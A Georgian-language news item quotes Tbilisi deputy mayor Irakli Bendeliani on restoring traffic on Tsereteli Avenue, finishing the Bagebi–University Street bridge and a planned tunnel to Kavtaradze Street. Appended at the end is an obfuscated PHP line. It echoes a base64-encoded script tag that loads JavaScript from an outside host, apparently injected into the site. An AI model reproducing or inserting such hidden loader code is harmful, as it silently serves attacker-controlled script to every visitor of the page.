celsiusi
ავერსი საქკაბელი

 თბილისის მერის მოადგილის, ირაკლი ბენდელიანის განცხადებით, წერეთლის გამზირზე სამანქანო მოძრაობა იანვრის ბოლოს სრულად აღდგება.

„პროექტის დასაწყისში როგორც იყო ნათქვამი, იანვრის ბოლოს წერეთლის გამზირზე სამანქანო მოძრაობა სრულად იქნება აღდგენილი, დარჩენილი იქნება მცირე სახის სამუშაოები, თუმცა ძირითადი ნაწილი დასრულდება. ამ გამზირზე მოძრაობა შეუფერხებლად იქნება შესაძლებელი“, – განაცხადა ირაკლი ბენდელიანმა.

ამასთან, როგორც ბენდელიანმა აღნიშნა, იანვრის ბოლოს დასრულდება ბაგები-უნივერსიტეტის ქუჩის დამაკავშირებელი სამანქანე ხიდის მშენებლობაც.

„დარჩენილი იქნება ტექნიკური დეტალები, რომლებიც თებერვლის ბოლოსთვის დასრულდება. აქაც გადაადგილება სრულად იქნება შესაძლებელი. ეს არის პროექტი, რომელიც მიმდინარე წელს გვაქვს დაგეგმილი. ხიდი უნივერსიტეტის ქუჩას როცა დაუკავშირდება, უნივერსიტეტის ქუჩიდან ქავთარაძემდე ახალი სამანქანე გვირაბი გაიჭრება. ფაქტობრივად, ბაგებიდან ქავთარაძეზე, ვაჟა-ფშაველაზე რამდენიმე წუთში იქნება გადაადგილება შესაძლებელი. რაც შეეხება პროცედურებს, ეს პროექტი რამდენიმე დღეში გვექნება ჩაბარებული და უახლოეს დღეებში, კვირაში გამოცხადდება მშენებლობაზე ტენდერი, რის შემდეგაც სამშენებლო სამუშაოები დაიწყება. სამუშაოს დაწყების შემდეგ, დაახლოებით, ექვს თვეში დამთავრდება მშენებლობა“, – განაცხადა ბენდელიანმა.

310
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");